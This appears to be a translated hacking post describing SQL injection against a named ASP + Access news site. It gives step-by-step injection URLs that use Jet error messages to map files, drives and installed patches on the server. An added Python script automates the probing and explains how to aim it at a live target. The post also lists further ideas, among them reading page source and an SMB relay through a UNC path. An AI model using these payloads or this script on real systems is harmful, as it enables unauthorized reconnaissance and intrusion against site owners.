Preliminary Report on the Cross-File Query Vulnerability in Access Databases

Source: Internet
Author: User

I. I stumbled on this vulnerability while playing with SQL injection:

1. Access http://www.lznet.net/news/displaynews.asp?id=24794'

Page error message:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'id=24794''.

/news/displaynews.asp, line 133

2. Access http://www.lznet.net/news/displaynews.asp?id=24794 and 1=1

The page displays normally.

3. Access http://www.lznet.net/news/displaynews.asp?id=24794 and 1=2

The page returns "File Not Found".

This is a typical SQL injection vulnerability in an ASP + Access site. Next, guess the table name:

4. Access http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from news)

Page error: The database engine cannot find the input table or query 'news'.

5. Access http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from admin)

Page error: The database engine cannot find the input table or query 'admin'.

6. Then I remembered that in the error messages obtained through SQL injection the table name appears in the form news.id, where news is the table name and id is a column in that table.

7. Access http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from lznet.)

Error: Could not find file 'C:\WINNT\system32\lznet.mdb'.

8. I tried the web root directory and every virtual directory I knew of, but I could not download this lznet.mdb. The file name was one I had made up myself (Access appended .mdb to the table name lznet). But what caused the physical path of the system directory to leak? Could I try again and query the file C:\winnt\system32\cmd.exe?

9. Access http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from cmd.exe.)

The format of this statement was worked out through repeated experiments :)

Error: "The database engine cannot open the file 'C:\WINNT\system32\CMD.EXE'. It is already opened exclusively by another user, or you need permission to view its data."

Analysis of the error messages above: I think our rights are limited, because ASP runs with Guest privileges, while cmd.exe is Everyone: R. The two messages tell the existence of the file apart: if the file exists, the engine reports that it cannot open it as a database; if the file does not exist, the engine reports that it cannot find the file.

10. Access http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from c:\cmd.exe.)

Here we can see that cross-directory queries are feasible.

Error:

Could not find file 'C:\cmd.exe'.

11. Access http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from c:\boot.ini.)

Note: boot.ini is the Windows 2000 boot file in the root directory of the system drive.

Error:

The database engine cannot open the file 'C:\boot.ini'. It is already opened exclusively by another user, or you need permission to view its data.

12. Access http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from d:\boot.ini.)

Cross-drive queries are also feasible.

Error:

Could not find file 'D:\boot.ini'.

13. Access http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from I:\boot.ini.)

Error:

'I:\boot.ini' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.

Note: the error message honestly tells us that the system has no I: drive. Access error messages are more detailed than SQL Server's in some respects.

14. This one is fairly practical. If the target has installed a service pack or hotfixes, the following uninstall entries will exist under the winnt directory, and we can use this vulnerability to look for them to confirm the host's patch status:

[$NtUninstallQ329553$] [$NtUninstallQ329834$]

[$NtUninstallQ331953$] [$NtUninstallQ838533$]

[$NtUninstallQ811114$] [$NtUninstallQ811493$]

[$NtUninstallQ815021$] [$NtUninstallSP2SRP1$]

...............
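The probing loop in steps 7 to 14 can be automated, because the Jet error text is an oracle with four distinct answers: table missing, file not found, file exists but cannot be opened as a database, and drive does not exist. The following Python is an added example, not code from the original post. It uses the English Jet error strings (the page quotes them in translation), the page's URL and record id, and a constructed stand-in `fake_fetch` that answers the way the target above answered, so it runs offline; the drive set and file set inside the stand-in are assumptions. Against a real target you would replace `fake_fetch` with a function that performs the HTTP request and returns the body.

```python
"""Error-based file-existence oracle built on the Jet behaviour shown above.
Added example; the target stand-in below is constructed, not the real site."""
import re
from urllib.parse import parse_qs, quote, urlsplit

BASE = "http://www.lznet.net/news/displaynews.asp?id="  # URL from the page
RECORD_ID = 24794                                         # record id from the page

# English Jet/Access error texts; the page quotes them in translation.
# Order matters: the first matching pattern wins.
PATTERNS = [
    ("no_such_drive", re.compile(r"is not a valid path", re.I)),
    ("table_missing", re.compile(r"cannot find the input table or query", re.I)),
    ("missing", re.compile(r"could not find file", re.I)),
    ("exists", re.compile(r"cannot open the file", re.I)),  # present, not an .mdb
]


def classify(body: str) -> str:
    """Turn a response body into what it reveals about the probed path."""
    for label, pat in PATTERNS:
        if pat.search(body):
            return label
    return "normal"  # no Jet error text: the injected predicate ran cleanly


def build_payload(record_id: int, path: str) -> str:
    """The trailing dot after the name is what makes Jet treat it as a file."""
    return f"{record_id} and 0<>(select count(*) from {path}.)"


def build_url(base: str, record_id: int, path: str) -> str:
    # safe="" so that '*', '<', '>', ':' and '\' are all percent-encoded
    return base + quote(build_payload(record_id, path), safe="")


def map_target(fetch, base: str, record_id: int, paths) -> dict:
    """Probe every path with fetch(url) -> body and return {path: status}."""
    return {p: classify(fetch(build_url(base, record_id, p))) for p in paths}


# ---- constructed stand-in for the vulnerable site (assumption, offline) ----
FAKE_DRIVES = {"c", "d"}
FAKE_FILES = {r"c:\boot.ini", r"c:\winnt\system32\cmd.exe"}
SYSTEM32 = r"c:\winnt\system32"


def fake_fetch(url: str) -> str:
    """Answer the way the page's target answered, using Jet's English texts."""
    injected = parse_qs(urlsplit(url).query)["id"][0]
    m = re.search(r"from (.+?)\.\)$", injected, re.I)
    if not m:
        return "<html>article 24794</html>"
    target = m.group(1).lower()
    if ":" not in target:  # bare name resolves under system32 (step 7)
        target = SYSTEM32 + "\\" + target
    if "." not in target.rsplit("\\", 1)[-1]:  # no extension: Jet assumes .mdb
        target += ".mdb"
    if target[0] not in FAKE_DRIVES:
        return (f"'{target}' is not a valid path.  Make sure that the path "
                "name is spelled correctly and that you are connected to the "
                "server on which the file resides.")
    if target in FAKE_FILES:
        return ("The Microsoft Jet database engine cannot open the file "
                f"'{target}'.  It is already opened exclusively by another "
                "user, or you need permission to view its data.")
    return f"Could not find file '{target}'."


if __name__ == "__main__":
    probes = [r"c:\boot.ini", r"d:\boot.ini", r"i:\boot.ini", "cmd.exe",
              r"c:\winnt\$NtUninstallQ815021$"]
    for path, status in map_target(fake_fetch, BASE, RECORD_ID, probes).items():
        print(f"{status:14} {path}")
```

The classifier deliberately returns "normal" when no Jet text is present, which is the signal that the site has stopped sending query errors to the browser (condition (2) in section II) and the oracle has gone silent.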

II. Ideas for exploiting the vulnerability:

1. Query a dynamic web page file: use a query statement to obtain the source code of a dynamic page, for example by reading the file content into a column of a table and then using len() to guess the content of the column until the source code is recovered.

2. Guess directory locations, file names and so on, to learn about the target host: which partition the system is installed on, how many partitions there are, and which patches have been applied.

3. Query a UNC path, such as \\1.1.1.1\2.16a.vbs, where \\1.1.1.1 is running smbrelay. Using SMB redirection we obtain an IPC connection with Guest permission, which is much more interesting.

4. Search for sensitive files, for example *.cif, *.mdb and so on, but I have not managed to use wildcards in Access file queries, probably because I am a database newbie.

5. Execute files. If that were possible we would hit the jackpot.

6. Some of the ideas above may be wrong and still need to be verified (tell me what you think).

My understanding of this vulnerability:

Access query processing has a flaw. If we construct a malformed table name, Access cannot find such a table in the .mdb file and, when the name is constructed in the right form, treats it as a file name and goes looking for it on the hard disk (by default under system32). I also tested SQL Server and did not find this problem. Exploiting this vulnerability requires two conditions (spelled out in case some people do not understand):

(1) The target is an ASP + Access application, and the ASP code filters input insufficiently, so that we can inject SQL statements remotely.

(2) The ASP page must display the details of the failed query, such as "The database engine cannot find the input table or query 'news'". Otherwise there is no way to tell whether the query succeeded, and the whole thing is pointless.
